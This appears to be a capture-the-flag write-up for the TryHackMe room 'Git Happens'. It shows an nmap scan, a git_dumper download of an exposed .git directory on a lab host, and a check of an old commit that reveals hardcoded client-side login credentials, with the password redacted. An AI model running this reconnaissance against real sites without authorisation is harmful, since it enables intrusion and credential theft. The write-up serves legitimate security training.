4 minutes
THM: Git Happens
Title:Git Happens
Description:Boss wanted me to create a prototype, so here it is! We even used something called "version control" that made deploying this really easy!
Difficulty:Easy
Tags:
Nmap
First we scan for open ports
# nmap -p- -T4 -sV -sC 10.10.34.27 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-12 19:25 BST
Nmap scan report for 10.10.34.27
Host is up (0.020s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.0 (Ubuntu)
| http-git:
| 10.10.34.27:80/.git/
| Git repository found!
|_ Repository description: Unnamed repository; edit this file 'description' to name the...
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.78 seconds
Website
Looking at the website it is a login form.
From the nmap scan we notice that a .git subdirectory was discovered and we can confirm it exists in browser. Using gitdumper we pull down the contents.
# python3 -m git_dumper http://10.10.34.27/.git/ repo
Warning: Destination '.' is not empty
[-] Testing http://10.10.34.27/.git/HEAD [200]
[-] Testing http://10.10.34.27/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://10.10.34.27/.git/ [200]
[-] Fetching http://10.10.34.27/.gitignore [404]
[-] http://10.10.34.27/.gitignore responded with status code 404
[-] Fetching http://10.10.34.27/.git/index [200]
[-] Fetching http://10.10.34.27/.git/branches/ [200]
[-] Fetching http://10.10.34.27/.git/info/ [200]
[-] Fetching http://10.10.34.27/.git/logs/ [200]
[-] Fetching http://10.10.34.27/.git/objects/ [200]
[-] Fetching http://10.10.34.27/.git/HEAD [200]
[-] Fetching http://10.10.34.27/.git/packed-refs [200]
[-] Fetching http://10.10.34.27/.git/description [200]
[-] Fetching http://10.10.34.27/.git/hooks/ [200]
[-] Fetching http://10.10.34.27/.git/refs/ [200]
[-] Fetching http://10.10.34.27/.git/config [200]
[-] Fetching http://10.10.34.27/.git/logs/HEAD [200]
[-] Fetching http://10.10.34.27/.git/logs/refs/ [200]
[-] Fetching http://10.10.34.27/.git/info/exclude [200]
[-] Fetching http://10.10.34.27/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://10.10.34.27/.git/refs/heads/ [200]
[-] Fetching http://10.10.34.27/.git/refs/tags/ [200]
[-] Fetching http://10.10.34.27/.git/hooks/commit-msg.sample [200]
[-] Fetching http://10.10.34.27/.git/refs/remotes/ [200]
...
...
[-] Sanitizing .git/config
[-] Running git checkout .
Updated 7 paths from the index
Changing directory in the repo folder we used to clone the site contents too we run git status and given the normal response it appears we have a working repo.
# git status
On branch master
nothing to commit, working tree clean
To check what has happened in the repo we run git log.
# git log
commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0)
Author: Adam Bertrand <hydragyrum@gmail.com>
Date: Thu Jul 23 22:22:16 2020 +0000
Update .gitlab-ci.yml
commit 77aab78e2624ec9400f9ed3f43a6f0c942eeb82d
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Fri Jul 24 00:21:25 2020 +0200
add gitlab-ci config to build docker file.
commit 2eb93ac3534155069a8ef59cb25b9c1971d5d199
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Fri Jul 24 00:08:38 2020 +0200
setup dockerfile and setup defaults.
commit d6df4000639981d032f628af2b4d03b8eff31213
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:42:30 2020 +0200
Make sure the css is standard-ish!
commit d954a99b96ff11c37a558a5d93ce52d0f3702a7d
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:41:12 2020 +0200
re-obfuscating the code to be really secure!
commit bc8054d9d95854d278359a432b6d97c27e24061d
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:37:32 2020 +0200
Security says obfuscation isn't enough.
They want me to use something called 'SHA-512'
commit e56eaa8e29b589976f33d76bc58a0c4dfb9315b1
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:25:52 2020 +0200
Obfuscated the source code.
Hopefully security will be happy!
commit 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:17:43 2020 +0200
Made the login page, boss!
commit 2f423697bf81fe5956684f66fb6fc6596a1903cc
Author: Adam Bertrand <hydragyrum@gmail.com>
Date: Mon Jul 20 20:46:28 2020 +0000
Initial commit
We notice there is an entry about obsfuscating some code to make security happy, and that the entry before involved the creation of the login page. We want to see what was part of the code before it was changed so we checkout the relevant commit.
# git checkout 395e087334d613d5e423cdf8f7be27196a360459
Note: switching to '395e087334d613d5e423cdf8f7be27196a360459'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:
git switch -c <new-branch-name>
Or undo this operation with:
git switch -
Turn off this advice by setting config variable advice.detachedHead to false
HEAD is now at 395e087 Made the login page, boss!
Looking inside the index.html for this version of code we see some credentials. The password is the flag needed for the room.
# cat index.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Super Awesome Site!</title>
<link rel="stylesheet" href="/css/style.css">
</head>
<body>
...
...
<script>
function login() {
let form = document.getElementById("login-form");
console.log(form.elements);
let username = form.elements["username"].value;
let password = form.elements["password"].value;
if (
username === "admin" &&
password === "***********************************"
) {
document.cookie = "login=1";
window.location.href = "/dashboard.html";
} else {
document.getElementById("error").innerHTML =
"INVALID USERNAME OR PASSWORD!";
}
}
</script>
</body>
</html>